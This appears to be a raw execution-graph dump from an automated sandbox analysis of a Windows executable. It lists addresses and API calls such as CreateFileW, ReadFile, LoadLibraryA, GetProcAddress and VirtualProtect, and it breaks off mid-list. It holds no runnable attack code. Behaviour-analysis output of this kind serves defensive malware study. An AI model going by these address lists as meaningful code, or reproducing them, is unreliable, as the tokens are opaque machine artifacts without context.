                                                                                                                                                                                                                                                                execution_graph 76287 7ff6f0bd2fe0 76288 7ff6f0bd2ff0 76287->76288 76289 7ff6f0bd3041 76288->76289 76290 7ff6f0bd302b 76288->76290 76292 7ff6f0bd3061 76289->76292 76302 7ff6f0bd3077 __vcrt_freefls 76289->76302 76349 7ff6f0bd2710 54 API calls _log10_special 76290->76349 76350 7ff6f0bd2710 54 API calls _log10_special 76292->76350 76297 7ff6f0bd3349 76366 7ff6f0bd2710 54 API calls _log10_special 76297->76366 76300 7ff6f0bd3333 76365 7ff6f0bd2710 54 API calls _log10_special 76300->76365 76302->76297 76302->76300 76303 7ff6f0bd330d 76302->76303 76305 7ff6f0bd3207 76302->76305 76314 7ff6f0bd3037 __vcrt_freefls 76302->76314 76315 7ff6f0bd1470 76302->76315 76345 7ff6f0bd1c80 76302->76345 76364 7ff6f0bd2710 54 API calls _log10_special 76303->76364 76306 7ff6f0bd3273 76305->76306 76360 7ff6f0bea474 37 API calls 2 library calls 76305->76360 76308 7ff6f0bd329e 76306->76308 76309 7ff6f0bd3290 76306->76309 76362 7ff6f0bd2dd0 37 API calls 76308->76362 76361 7ff6f0bea474 37 API calls 2 library calls 76309->76361 76312 7ff6f0bd329c 76363 7ff6f0bd2500 54 API calls __vcrt_freefls 76312->76363 76351 7ff6f0bdc5c0 76314->76351 76367 7ff6f0bd45b0 76315->76367 76318 7ff6f0bd149b 76407 7ff6f0bd2710 54 API calls _log10_special 76318->76407 76319 7ff6f0bd14bc 76377 7ff6f0be0744 76319->76377 76322 7ff6f0bd14ab 76322->76302 76323 7ff6f0bd14d1 76324 7ff6f0bd14d5 76323->76324 76325 7ff6f0bd14f8 76323->76325 76408 7ff6f0be4f78 11 API calls _get_daylight 76324->76408 76328 7ff6f0bd1532 76325->76328 76329 7ff6f0bd1508 76325->76329 76327 7ff6f0bd14da 76409 7ff6f0bd2910 54 API calls _log10_special 76327->76409 76332 7ff6f0bd1538 76328->76332 76337 7ff6f0bd154b 76328->76337 76410 7ff6f0be4f78 11 API calls _get_daylight 76329->76410 76381 7ff6f0bd1210 76332->76381 76333 7ff6f0bd1510 76411 7ff6f0bd2910 54 API calls _log10_special 76333->76411 76339 7ff6f0bd14f3 __vcrt_freefls 76337->76339 76341 7ff6f0bd15d6 76337->76341 76412 7ff6f0be040c 76337->76412 76403 7ff6f0be00bc 76339->76403 76340 7ff6f0bd15c4 76340->76302 76415 7ff6f0be4f78 11 API calls _get_daylight 76341->76415 76343 7ff6f0bd15db 76416 7ff6f0bd2910 54 API calls _log10_special 76343->76416 76346 7ff6f0bd1ca5 76345->76346 76660 7ff6f0be49f4 76346->76660 76349->76314 76350->76314 76352 7ff6f0bdc5c9 76351->76352 76353 7ff6f0bd31fa 76352->76353 76354 7ff6f0bdc950 IsProcessorFeaturePresent 76352->76354 76355 7ff6f0bdc968 76354->76355 76687 7ff6f0bdcb48 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 76355->76687 76357 7ff6f0bdc97b 76688 7ff6f0bdc910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 76357->76688 76360->76306 76361->76312 76362->76312 76363->76314 76364->76314 76365->76314 76366->76314 76368 7ff6f0bd45bc 76367->76368 76417 7ff6f0bd9400 76368->76417 76370 7ff6f0bd45e4 76371 7ff6f0bd9400 2 API calls 76370->76371 76372 7ff6f0bd45f7 76371->76372 76422 7ff6f0be6004 76372->76422 76375 7ff6f0bdc5c0 _log10_special 8 API calls 76376 7ff6f0bd1493 76375->76376 76376->76318 76376->76319 76378 7ff6f0be0774 76377->76378 76593 7ff6f0be04d4 76378->76593 76380 7ff6f0be078d 76380->76323 76382 7ff6f0bd1268 76381->76382 76383 7ff6f0bd126f 76382->76383 76384 7ff6f0bd1297 76382->76384 76610 7ff6f0bd2710 54 API calls _log10_special 76383->76610 76387 7ff6f0bd12d4 76384->76387 76388 7ff6f0bd12b1 76384->76388 76386 7ff6f0bd1282 76386->76339 76392 7ff6f0bd12e6 76387->76392 76396 7ff6f0bd1309 memcpy_s 76387->76396 76611 7ff6f0be4f78 11 API calls _get_daylight 76388->76611 76390 7ff6f0bd12b6 76612 7ff6f0bd2910 54 API calls _log10_special 76390->76612 76613 7ff6f0be4f78 11 API calls _get_daylight 76392->76613 76394 7ff6f0be040c _fread_nolock 53 API calls 76394->76396 76395 7ff6f0bd12eb 76614 7ff6f0bd2910 54 API calls _log10_special 76395->76614 76396->76394 76398 7ff6f0bd12cf __vcrt_freefls 76396->76398 76399 7ff6f0bd13cf 76396->76399 76402 7ff6f0be0180 37 API calls 76396->76402 76606 7ff6f0be0b4c 76396->76606 76398->76339 76615 7ff6f0bd2710 54 API calls _log10_special 76399->76615 76402->76396 76404 7ff6f0be00ec 76403->76404 76632 7ff6f0bdfe98 76404->76632 76406 7ff6f0be0105 76406->76340 76407->76322 76408->76327 76409->76339 76410->76333 76411->76339 76644 7ff6f0be042c 76412->76644 76415->76343 76416->76339 76418 7ff6f0bd9422 MultiByteToWideChar 76417->76418 76421 7ff6f0bd9446 76417->76421 76419 7ff6f0bd945c __vcrt_freefls 76418->76419 76418->76421 76419->76370 76420 7ff6f0bd9463 MultiByteToWideChar 76420->76419 76421->76419 76421->76420 76423 7ff6f0be5f38 76422->76423 76424 7ff6f0be5f5e 76423->76424 76426 7ff6f0be5f91 76423->76426 76453 7ff6f0be4f78 11 API calls _get_daylight 76424->76453 76428 7ff6f0be5fa4 76426->76428 76429 7ff6f0be5f97 76426->76429 76427 7ff6f0be5f63 76454 7ff6f0bea950 37 API calls _invalid_parameter_noinfo 76427->76454 76441 7ff6f0beac98 76428->76441 76455 7ff6f0be4f78 11 API calls _get_daylight 76429->76455 76434 7ff6f0be5fc5 76448 7ff6f0beff3c 76434->76448 76435 7ff6f0be5fb8 76456 7ff6f0be4f78 11 API calls _get_daylight 76435->76456 76438 7ff6f0be5fd8 76457 7ff6f0be54e8 LeaveCriticalSection 76438->76457 76440 7ff6f0bd4606 76440->76375 76458 7ff6f0bf0348 EnterCriticalSection 76441->76458 76443 7ff6f0beacaf 76444 7ff6f0bead0c 19 API calls 76443->76444 76445 7ff6f0beacba 76444->76445 76446 7ff6f0bf03a8 _isindst LeaveCriticalSection 76445->76446 76447 7ff6f0be5fae 76446->76447 76447->76434 76447->76435 76459 7ff6f0befc38 76448->76459 76451 7ff6f0beff96 76451->76438 76453->76427 76454->76440 76455->76440 76456->76440 76460 7ff6f0befc73 __vcrt_InitializeCriticalSectionEx 76459->76460 76469 7ff6f0befe3a 76460->76469 76474 7ff6f0be7aac 51 API calls 3 library calls 76460->76474 76462 7ff6f0beff11 76478 7ff6f0bea950 37 API calls _invalid_parameter_noinfo 76462->76478 76464 7ff6f0befe43 76464->76451 76471 7ff6f0bf6dc4 76464->76471 76466 7ff6f0befea5 76466->76469 76475 7ff6f0be7aac 51 API calls 3 library calls 76466->76475 76468 7ff6f0befec4 76468->76469 76476 7ff6f0be7aac 51 API calls 3 library calls 76468->76476 76469->76464 76477 7ff6f0be4f78 11 API calls _get_daylight 76469->76477 76479 7ff6f0bf63c4 76471->76479 76474->76466 76475->76468 76476->76469 76477->76462 76478->76464 76480 7ff6f0bf63db 76479->76480 76484 7ff6f0bf63f9 76479->76484 76533 7ff6f0be4f78 11 API calls _get_daylight 76480->76533 76482 7ff6f0bf63e0 76534 7ff6f0bea950 37 API calls _invalid_parameter_noinfo 76482->76534 76483 7ff6f0bf6415 76490 7ff6f0bf69d4 76483->76490 76484->76480 76484->76483 76488 7ff6f0bf63ec 76488->76451 76536 7ff6f0bf6708 76490->76536 76493 7ff6f0bf6a61 76555 7ff6f0be8590 76493->76555 76494 7ff6f0bf6a49 76567 7ff6f0be4f58 11 API calls _get_daylight 76494->76567 76497 7ff6f0bf6a4e 76568 7ff6f0be4f78 11 API calls _get_daylight 76497->76568 76525 7ff6f0bf6440 76525->76488 76535 7ff6f0be8568 LeaveCriticalSection 76525->76535 76533->76482 76534->76488 76537 7ff6f0bf6734 76536->76537 76544 7ff6f0bf674e 76536->76544 76537->76544 76580 7ff6f0be4f78 11 API calls _get_daylight 76537->76580 76539 7ff6f0bf6743 76581 7ff6f0bea950 37 API calls _invalid_parameter_noinfo 76539->76581 76541 7ff6f0bf681d 76553 7ff6f0bf687a 76541->76553 76586 7ff6f0be9be8 37 API calls 2 library calls 76541->76586 76542 7ff6f0bf67cc 76542->76541 76584 7ff6f0be4f78 11 API calls _get_daylight 76542->76584 76544->76542 76582 7ff6f0be4f78 11 API calls _get_daylight 76544->76582 76546 7ff6f0bf6876 76546->76553 76587 7ff6f0bea970 IsProcessorFeaturePresent 76546->76587 76548 7ff6f0bf6812 76585 7ff6f0bea950 37 API calls _invalid_parameter_noinfo 76548->76585 76549 7ff6f0bf67c1 76583 7ff6f0bea950 37 API calls _invalid_parameter_noinfo 76549->76583 76553->76493 76553->76494 76592 7ff6f0bf0348 EnterCriticalSection 76555->76592 76567->76497 76568->76525 76580->76539 76581->76544 76582->76549 76583->76542 76584->76548 76585->76541 76586->76546 76588 7ff6f0bea983 76587->76588 76591 7ff6f0bea684 14 API calls 3 library calls 76588->76591 76590 7ff6f0bea99e GetCurrentProcess TerminateProcess 76591->76590 76594 7ff6f0be053e 76593->76594 76595 7ff6f0be04fe 76593->76595 76594->76595 76597 7ff6f0be054a 76594->76597 76605 7ff6f0bea884 37 API calls 2 library calls 76595->76605 76604 7ff6f0be54dc EnterCriticalSection 76597->76604 76598 7ff6f0be0525 76598->76380 76600 7ff6f0be054f 76601 7ff6f0be0658 71 API calls 76600->76601 76602 7ff6f0be0561 76601->76602 76603 7ff6f0be54e8 _fread_nolock LeaveCriticalSection 76602->76603 76603->76598 76605->76598 76607 7ff6f0be0b7c 76606->76607 76616 7ff6f0be089c 76607->76616 76609 7ff6f0be0b9a 76609->76396 76610->76386 76611->76390 76612->76398 76613->76395 76614->76398 76615->76398 76617 7ff6f0be08bc 76616->76617 76622 7ff6f0be08e9 76616->76622 76618 7ff6f0be08f1 76617->76618 76619 7ff6f0be08c6 76617->76619 76617->76622 76623 7ff6f0be07dc 76618->76623 76630 7ff6f0bea884 37 API calls 2 library calls 76619->76630 76622->76609 76631 7ff6f0be54dc EnterCriticalSection 76623->76631 76625 7ff6f0be07f9 76626 7ff6f0be081c 74 API calls 76625->76626 76627 7ff6f0be0802 76626->76627 76628 7ff6f0be54e8 _fread_nolock LeaveCriticalSection 76627->76628 76629 7ff6f0be080d 76628->76629 76629->76622 76630->76622 76633 7ff6f0bdfeb3 76632->76633 76634 7ff6f0bdfee1 76632->76634 76643 7ff6f0bea884 37 API calls 2 library calls 76633->76643 76638 7ff6f0bdfed3 76634->76638 76642 7ff6f0be54dc EnterCriticalSection 76634->76642 76637 7ff6f0bdfef8 76639 7ff6f0bdff14 72 API calls 76637->76639 76638->76406 76640 7ff6f0bdff04 76639->76640 76641 7ff6f0be54e8 _fread_nolock LeaveCriticalSection 76640->76641 76641->76638 76643->76638 76645 7ff6f0be0424 76644->76645 76646 7ff6f0be0456 76644->76646 76645->76337 76646->76645 76647 7ff6f0be04a2 76646->76647 76648 7ff6f0be0465 __scrt_get_show_window_mode 76646->76648 76657 7ff6f0be54dc EnterCriticalSection 76647->76657 76658 7ff6f0be4f78 11 API calls _get_daylight 76648->76658 76651 7ff6f0be04aa 76653 7ff6f0be01ac _fread_nolock 51 API calls 76651->76653 76652 7ff6f0be047a 76659 7ff6f0bea950 37 API calls _invalid_parameter_noinfo 76652->76659 76655 7ff6f0be04c1 76653->76655 76656 7ff6f0be54e8 _fread_nolock LeaveCriticalSection 76655->76656 76656->76645 76658->76652 76659->76645 76663 7ff6f0be4a4e 76660->76663 76661 7ff6f0be4a73 76678 7ff6f0bea884 37 API calls 2 library calls 76661->76678 76662 7ff6f0be4aaf 76679 7ff6f0be2c80 49 API calls _invalid_parameter_noinfo 76662->76679 76663->76661 76663->76662 76666 7ff6f0be4a9d 76667 7ff6f0bdc5c0 _log10_special 8 API calls 76666->76667 76670 7ff6f0bd1cc8 76667->76670 76668 7ff6f0bea9b8 __free_lconv_mon 11 API calls 76668->76666 76669 7ff6f0be4b46 76671 7ff6f0be4bb0 76669->76671 76672 7ff6f0be4b58 76669->76672 76673 7ff6f0be4b8c 76669->76673 76676 7ff6f0be4b61 76669->76676 76670->76302 76671->76673 76674 7ff6f0be4bba 76671->76674 76672->76673 76672->76676 76673->76668 76677 7ff6f0bea9b8 __free_lconv_mon 11 API calls 76674->76677 76680 7ff6f0bea9b8 76676->76680 76677->76666 76678->76666 76679->76669 76681 7ff6f0bea9bd HeapFree 76680->76681 76685 7ff6f0bea9ec 76680->76685 76682 7ff6f0bea9d8 GetLastError 76681->76682 76681->76685 76683 7ff6f0bea9e5 __free_lconv_mon 76682->76683 76686 7ff6f0be4f78 11 API calls _get_daylight 76683->76686 76685->76666 76686->76685 76687->76357 76689 7ff6f0bef9fc 76690 7ff6f0befbee 76689->76690 76694 7ff6f0befa3e _isindst 76689->76694 76735 7ff6f0be4f78 11 API calls _get_daylight 76690->76735 76692 7ff6f0bdc5c0 _log10_special 8 API calls 76693 7ff6f0befc09 76692->76693 76694->76690 76695 7ff6f0befabe _isindst 76694->76695 76710 7ff6f0bf6204 76695->76710 76700 7ff6f0befc1a 76701 7ff6f0bea970 _isindst 17 API calls 76700->76701 76704 7ff6f0befc2e 76701->76704 76707 7ff6f0befb1b 76709 7ff6f0befbde 76707->76709 76734 7ff6f0bf6248 37 API calls _isindst 76707->76734 76709->76692 76711 7ff6f0bf6213 76710->76711 76712 7ff6f0befadc 76710->76712 76736 7ff6f0bf0348 EnterCriticalSection 76711->76736 76716 7ff6f0bf5608 76712->76716 76714 7ff6f0bf621b 76714->76712 76715 7ff6f0bf6074 55 API calls 76714->76715 76715->76712 76717 7ff6f0bf5611 76716->76717 76718 7ff6f0befaf1 76716->76718 76737 7ff6f0be4f78 11 API calls _get_daylight 76717->76737 76718->76700 76722 7ff6f0bf5638 76718->76722 76720 7ff6f0bf5616 76738 7ff6f0bea950 37 API calls _invalid_parameter_noinfo 76720->76738 76723 7ff6f0bf5641 76722->76723 76724 7ff6f0befb02 76722->76724 76739 7ff6f0be4f78 11 API calls _get_daylight 76723->76739 76724->76700 76728 7ff6f0bf5668 76724->76728 76726 7ff6f0bf5646 76740 7ff6f0bea950 37 API calls _invalid_parameter_noinfo 76726->76740 76729 7ff6f0bf5671 76728->76729 76730 7ff6f0befb13 76728->76730 76741 7ff6f0be4f78 11 API calls _get_daylight 76729->76741 76730->76700 76730->76707 76732 7ff6f0bf5676 76742 7ff6f0bea950 37 API calls _invalid_parameter_noinfo 76732->76742 76734->76709 76735->76709 76737->76720 76738->76718 76739->76726 76740->76724 76741->76732 76742->76730 76752 7ff6f0be5698 76753 7ff6f0be56b2 76752->76753 76754 7ff6f0be56cf 76752->76754 76803 7ff6f0be4f58 11 API calls _get_daylight 76753->76803 76754->76753 76755 7ff6f0be56e2 CreateFileW 76754->76755 76758 7ff6f0be574c 76755->76758 76759 7ff6f0be5716 76755->76759 76757 7ff6f0be56b7 76804 7ff6f0be4f78 11 API calls _get_daylight 76757->76804 76806 7ff6f0be5c74 46 API calls 3 library calls 76758->76806 76777 7ff6f0be57ec GetFileType 76759->76777 76763 7ff6f0be56bf 76805 7ff6f0bea950 37 API calls _invalid_parameter_noinfo 76763->76805 76765 7ff6f0be5751 76769 7ff6f0be5755 76765->76769 76770 7ff6f0be5780 76765->76770 76767 7ff6f0be5741 CloseHandle 76773 7ff6f0be56ca 76767->76773 76768 7ff6f0be572b CloseHandle 76768->76773 76807 7ff6f0be4eec 11 API calls 2 library calls 76769->76807 76808 7ff6f0be5a34 76770->76808 76776 7ff6f0be575f 76776->76773 76778 7ff6f0be583a 76777->76778 76779 7ff6f0be58f7 76777->76779 76780 7ff6f0be5866 GetFileInformationByHandle 76778->76780 76826 7ff6f0be5b70 21 API calls _fread_nolock 76778->76826 76781 7ff6f0be58ff 76779->76781 76782 7ff6f0be5921 76779->76782 76785 7ff6f0be5912 GetLastError 76780->76785 76786 7ff6f0be588f 76780->76786 76781->76785 76787 7ff6f0be5903 76781->76787 76783 7ff6f0be5944 PeekNamedPipe 76782->76783 76792 7ff6f0be58e2 76782->76792 76783->76792 76829 7ff6f0be4eec 11 API calls 2 library calls 76785->76829 76790 7ff6f0be5a34 51 API calls 76786->76790 76828 7ff6f0be4f78 11 API calls _get_daylight 76787->76828 76789 7ff6f0be5854 76789->76780 76789->76792 76794 7ff6f0be589a 76790->76794 76793 7ff6f0bdc5c0 _log10_special 8 API calls 76792->76793 76795 7ff6f0be5724 76793->76795 76819 7ff6f0be5994 76794->76819 76795->76767 76795->76768 76798 7ff6f0be5994 10 API calls 76799 7ff6f0be58b9 76798->76799 76800 7ff6f0be5994 10 API calls 76799->76800 76801 7ff6f0be58ca 76800->76801 76801->76792 76827 7ff6f0be4f78 11 API calls _get_daylight 76801->76827 76803->76757 76804->76763 76805->76773 76806->76765 76807->76776 76809 7ff6f0be5a5c 76808->76809 76817 7ff6f0be578d 76809->76817 76830 7ff6f0bef794 51 API calls 2 library calls 76809->76830 76811 7ff6f0be5af0 76811->76817 76831 7ff6f0bef794 51 API calls 2 library calls 76811->76831 76813 7ff6f0be5b03 76813->76817 76832 7ff6f0bef794 51 API calls 2 library calls 76813->76832 76815 7ff6f0be5b16 76815->76817 76833 7ff6f0bef794 51 API calls 2 library calls 76815->76833 76818 7ff6f0be5b70 21 API calls _fread_nolock 76817->76818 76818->76776 76820 7ff6f0be59b0 76819->76820 76821 7ff6f0be59bd FileTimeToSystemTime 76819->76821 76820->76821 76823 7ff6f0be59b8 76820->76823 76822 7ff6f0be59d1 SystemTimeToTzSpecificLocalTime 76821->76822 76821->76823 76822->76823 76824 7ff6f0bdc5c0 _log10_special 8 API calls 76823->76824 76825 7ff6f0be58a9 76824->76825 76825->76798 76826->76789 76827->76792 76828->76792 76829->76792 76830->76811 76831->76813 76832->76815 76833->76817 76834 7ffdfb09faa6 76835 7ffdfb09fad9 76834->76835 76836 7ffdfb09fac4 76834->76836 76858 7ffdfb085de0 76835->76858 76877 7ffdfb0a6a20 19 API calls 76836->76877 76840 7ffdfb09fad0 76842 7ffdfb0a1b7d 76840->76842 76845 7ffdfb0a1fb5 76840->76845 76878 7ffdfb069350 9 API calls 76840->76878 76843 7ffdfb0a25ab 76880 7ffdfb069350 9 API calls 76843->76880 76845->76843 76879 7ffdfb091eb0 9 API calls 76845->76879 76848 7ffdfb0a25f6 76849 7ffdfb0a2607 76848->76849 76881 7ffdfb095530 36 API calls 76848->76881 76851 7ffdfb0a2618 76849->76851 76882 7ffdfb066c40 9 API calls 76849->76882 76854 7ffdfb0a20c4 76851->76854 76883 7ffdfb0c1310 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 76851->76883 76857 7ffdfb0a20f7 76854->76857 76884 7ffdfb192920 76854->76884 76856 7ffdfb0a26d3 76861 7ffdfb085eb5 76858->76861 76863 7ffdfb085e07 76858->76863 76859 7ffdfb085eba 76859->76840 76870 7ffdfb085fd0 76859->76870 76860 7ffdfb085f8c 76902 7ffdfb069350 9 API calls 76860->76902 76861->76859 76891 7ffdfb081fa0 76861->76891 76863->76859 76863->76860 76865 7ffdfb085e0d 76863->76865 76865->76859 76866 7ffdfb085f63 76865->76866 76867 7ffdfb085f57 76865->76867 76901 7ffdfb085bd0 19 API calls 76866->76901 76900 7ffdfb125b10 9 API calls 76867->76900 76875 7ffdfb085ff3 76870->76875 76871 7ffdfb086140 76871->76840 76872 7ffdfb086158 76940 7ffdfb069350 9 API calls 76872->76940 76873 7ffdfb081fa0 19 API calls 76873->76875 76875->76871 76875->76872 76875->76873 76939 7ffdfb069350 9 API calls 76875->76939 76877->76840 76878->76845 76879->76843 76880->76848 76881->76849 76882->76851 76883->76854 76885 7ffdfb192929 76884->76885 76886 7ffdfb192934 76885->76886 76887 7ffdfb192974 IsProcessorFeaturePresent 76885->76887 76886->76856 76888 7ffdfb19298c 76887->76888 76941 7ffdfb192b6c RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 76888->76941 76890 7ffdfb19299f 76890->76856 76892 7ffdfb082004 76891->76892 76893 7ffdfb081fbd 76891->76893 76903 7ffdfb07a0e0 76892->76903 76914 7ffdfb069350 9 API calls 76893->76914 76895 7ffdfb081fee 76895->76863 76896 7ffdfb082015 76898 7ffdfb082019 76896->76898 76915 7ffdfb081c70 9 API calls 76896->76915 76898->76863 76900->76859 76901->76859 76902->76859 76904 7ffdfb07a102 76903->76904 76910 7ffdfb07a135 76903->76910 76922 7ffdfb069350 9 API calls 76904->76922 76907 7ffdfb07a258 76923 7ffdfb069350 9 API calls 76907->76923 76909 7ffdfb07a2b0 76913 7ffdfb07a16d 76909->76913 76916 7ffdfb078060 76909->76916 76910->76907 76910->76909 76912 7ffdfb07a12e 76910->76912 76910->76913 76912->76896 76913->76912 76924 7ffdfb077280 19 API calls 76913->76924 76914->76895 76915->76898 76917 7ffdfb07808f 76916->76917 76918 7ffdfb07809c 76916->76918 76936 7ffdfb07f040 10 API calls 76917->76936 76920 7ffdfb0780ac 76918->76920 76925 7ffdfb06d9f0 76918->76925 76920->76913 76922->76912 76923->76913 76924->76912 76926 7ffdfb06da1d 76925->76926 76935 7ffdfb06da6a 76925->76935 76927 7ffdfb06da53 00007FFE1A463010 76926->76927 76928 7ffdfb06da33 00007FFE1A463010 76926->76928 76927->76935 76931 7ffdfb06da38 76928->76931 76929 7ffdfb06da93 ReadFile 76930 7ffdfb06db29 76929->76930 76929->76935 76930->76931 76938 7ffdfb069350 9 API calls 76930->76938 76931->76920 76933 7ffdfb06db03 76937 7ffdfb06d820 13 API calls 76933->76937 76935->76929 76935->76930 76935->76933 76936->76918 76937->76931 76938->76931 76939->76875 76940->76871 76941->76890 76942 7ffdfb029060 76943 7ffdfb029c01 76942->76943 76950 7ffdfb029078 76942->76950 76944 7ffdfb029b0e LoadLibraryA 76945 7ffdfb029b28 76944->76945 76948 7ffdfb029b47 GetProcAddress 76945->76948 76945->76950 76947 7ffdfb029b69 VirtualProtect VirtualProtect 76947->76943 76948->76945 76949 7ffdfb029b5e 76948->76949 76950->76944 76950->76947 76951 7ffe0076ef30 76952 7ffe00761325 76951->76952 76953 7ffe0076ef50 SetLastError 76952->76953 76954 7ffe0076ef70 76953->76954 76955 7ffdfb0822e0 76960 7ffdfb082334 new[] 76955->76960 76956 7ffdfb192920 4 API calls 76957 7ffdfb082473 76956->76957 76958 7ffdfb08249d new[] 76961 7ffdfb082456 76958->76961 76965 7ffdfb08276e 76958->76965 76967 7ffdfb0792c0 76958->76967 76960->76958 76960->76961 76962 7ffdfb08248f 00007FFE1A463010 76960->76962 76961->76956 76962->76958 76963 7ffdfb0826f5 76963->76965 76966 7ffdfb06d9f0 16 API calls 76963->76966 76965->76961 76965->76965 76981 7ffdfb078a20 26 API calls 76965->76981 76966->76965 76968 7ffdfb079345 76967->76968 76977 7ffdfb07949d new[] 76967->76977 76970 7ffdfb07935e new[] 76968->76970 76968->76977 76969 7ffdfb0793a0 new[] 76971 7ffdfb079465 00007FFE1A463010 76969->76971 76976 7ffdfb079689 76969->76976 76979 7ffdfb0795d2 76969->76979 76972 7ffdfb079385 00007FFE1A463010 76970->76972 76970->76979 76973 7ffdfb07963b 76971->76973 76974 7ffdfb079487 00007FFE1A463010 76971->76974 76972->76969 76975 7ffdfb07963e 00007FFE1A463010 00007FFE1A463010 76973->76975 76974->76975 76975->76976 76976->76979 76982 7ffdfb06ffe0 76976->76982 76977->76969 76977->76977 76977->76979 76995 7ffdfb125b50 9 API calls 76977->76995 76979->76963 76981->76961 76987 7ffdfb070031 76982->76987 76984 7ffdfb192920 4 API calls 76986 7ffdfb070657 76984->76986 76985 7ffdfb0703b8 76985->76984 76986->76979 76987->76985 76988 7ffdfb070200 CreateFileW 76987->76988 76991 7ffdfb070485 76987->76991 76996 7ffdfb06fa20 15 API calls new[] 76987->76996 76997 7ffdfb070810 13 API calls 76987->76997 76998 7ffdfb069350 9 API calls 76987->76998 76988->76987 76999 7ffdfb06d820 13 API calls 76991->76999 76993 7ffdfb0704b0 77000 7ffdfb125b50 9 API calls 76993->77000 76995->76969 76996->76987 76997->76987 76998->76987 76999->76993 77000->76985 77001 7ffdfb071240 GetSystemInfo 77002 7ffdfb071274 77001->77002 77003 7ffdfb09fb8b 77004 7ffdfb09fba9 77003->77004 77007 7ffdfb0a1fb5 77004->77007 77010 7ffdfb09fbb7 77004->77010 77021 7ffdfb069350 9 API calls 77004->77021 77005 7ffdfb0a25ab 77023 7ffdfb069350 9 API calls 77005->77023 77007->77005 77022 7ffdfb091eb0 9 API calls 77007->77022 77010->77010 77011 7ffdfb0a25f6 77012 7ffdfb0a2607 77011->77012 77024 7ffdfb095530 36 API calls 77011->77024 77014 7ffdfb0a2618 77012->77014 77025 7ffdfb066c40 9 API calls 77012->77025 77017 7ffdfb0a20c4 77014->77017 77026 7ffdfb0c1310 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 77014->77026 77018 7ffdfb192920 4 API calls 77017->77018 77020 7ffdfb0a20f7 77017->77020 77019 7ffdfb0a26d3 77018->77019 77021->77007 77022->77005 77023->77011 77024->77012 77025->77014 77026->77017 77027 7ff6f0bdbb50 77028 7ff6f0bdbb7e 77027->77028 77029 7ff6f0bdbb65 77027->77029 77029->77028 77032 7ff6f0bed66c 77029->77032 77033 7ff6f0bed6b7 77032->77033 77037 7ff6f0bed67b _get_daylight 77032->77037 77040 7ff6f0be4f78 11 API calls _get_daylight 77033->77040 77035 7ff6f0bed69e HeapAlloc 77036 7ff6f0bdbbde 77035->77036 77035->77037 77037->77033 77037->77035 77039 7ff6f0bf3600 EnterCriticalSection LeaveCriticalSection _get_daylight 77037->77039 77039->77037 77040->77036 77041 7ffdfb0c3360 77042 7ffdfb0c3421 77041->77042 77043 7ffdfb0c33a2 77041->77043 77044 7ffdfb0c3426 77043->77044 77045 7ffdfb0c340e 77043->77045 77047 7ffdfb0c343e 77044->77047 77048 7ffdfb0c342d 77044->77048 77092 7ffdfb06a510 9 API calls 77045->77092 77055 7ffdfb066b90 77047->77055 77093 7ffdfb06a510 9 API calls 77048->77093 77053 7ffdfb0c3495 77085 7ffdfb0c1440 77053->77085 77056 7ffdfb066bb5 77055->77056 77094 7ffdfb066880 77056->77094 77059 7ffdfb066c2d 77061 7ffdfb0ad460 77059->77061 77060 7ffdfb066c18 00007FFE1A463010 77060->77059 77062 7ffdfb0ad4b4 77061->77062 77064 7ffdfb0ad4a3 77061->77064 77063 7ffdfb066880 9 API calls 77062->77063 77063->77064 77065 7ffdfb0ad5c1 00007FFE1A463010 77064->77065 77066 7ffdfb0ad5b1 00007FFE1A463010 77064->77066 77081 7ffdfb0ad73b 77064->77081 77070 7ffdfb0ad5ef 77065->77070 77066->77070 77068 7ffdfb0ad63f 77071 7ffdfb0ad676 77068->77071 77072 7ffdfb0ad680 77068->77072 77068->77081 77069 7ffdfb0ad624 00007FFE1A463010 77069->77068 77070->77068 77070->77069 77099 7ffdfb0adfc0 23 API calls 77071->77099 77100 7ffdfb0ad960 23 API calls new[] 77072->77100 77075 7ffdfb0ad67e 77076 7ffdfb0ad6ab 77075->77076 77101 7ffdfb11a150 23 API calls new[] 77075->77101 77077 7ffdfb0ad6b6 77076->77077 77078 7ffdfb0ad6fc 77076->77078 77080 7ffdfb0ad6bb 77077->77080 77082 7ffdfb0ad460 20 API calls 77077->77082 77078->77080 77083 7ffdfb0ad460 20 API calls 77078->77083 77080->77081 77084 7ffdfb0ad460 20 API calls 77080->77084 77081->77053 77082->77080 77083->77080 77084->77081 77086 7ffdfb0c146e 77085->77086 77087 7ffdfb0c14d8 77086->77087 77089 7ffdfb0c1473 77086->77089 77106 7ffdfb0ae270 9 API calls 77087->77106 77090 7ffdfb0c1477 77089->77090 77102 7ffdfb0ae350 77089->77102 77090->77042 77092->77042 77093->77042 77095 7ffdfb066840 new[] 77094->77095 77097 7ffdfb066865 77095->77097 77098 7ffdfb066c40 9 API calls 77095->77098 77097->77059 77097->77060 77098->77097 77099->77075 77100->77075 77101->77076 77103 7ffdfb0ae386 77102->77103 77105 7ffdfb0ae398 77103->77105 77107 7ffdfb066940 77103->77107 77105->77090 77106->77090 77108 7ffdfb0669f1 77107->77108 77109 7ffdfb06695a 77107->77109 77108->77105 77110 7ffdfb0669c8 77109->77110 77111 7ffdfb06696c 77109->77111 77120 7ffdfb0665d0 77110->77120 77113 7ffdfb066880 8 API calls 77111->77113 77114 7ffdfb066979 77113->77114 77118 7ffdfb06699a 00007FFE1A463010 77114->77118 77119 7ffdfb0669aa 77114->77119 77117 7ffdfb0669e3 77117->77105 77118->77119 77119->77105 77121 7ffdfb0665e5 77120->77121 77122 7ffdfb06660b 77121->77122 77125 7ffdfb065b95 77121->77125 77122->77119 77124 7ffdfb066c40 9 API calls 77122->77124 77124->77117 77127 7ffdfb065bae 77125->77127 77126 7ffdfb065bd6 77126->77122 77127->77126 77129 7ffdfb069350 9 API calls 77127->77129 77129->77126 77130 7ffdfb0c0da0 77131 7ffdfb0c0dcc 77130->77131 77134 7ffdfb0c0dd1 77130->77134 77143 7ffdfb0e49e0 77131->77143 77133 7ffdfb0c0ed4 77135 7ffdfb0c0f1a 77133->77135 77136 7ffdfb0c0f30 77133->77136 77139 7ffdfb0c0ed8 77133->77139 77134->77133 77134->77139 77142 7ffdfb0c0ec1 77134->77142 77147 7ffdfb0fe1f0 10 API calls new[] 77134->77147 77149 7ffdfb06a510 9 API calls 77135->77149 77150 7ffdfb06a510 9 API calls 77136->77150 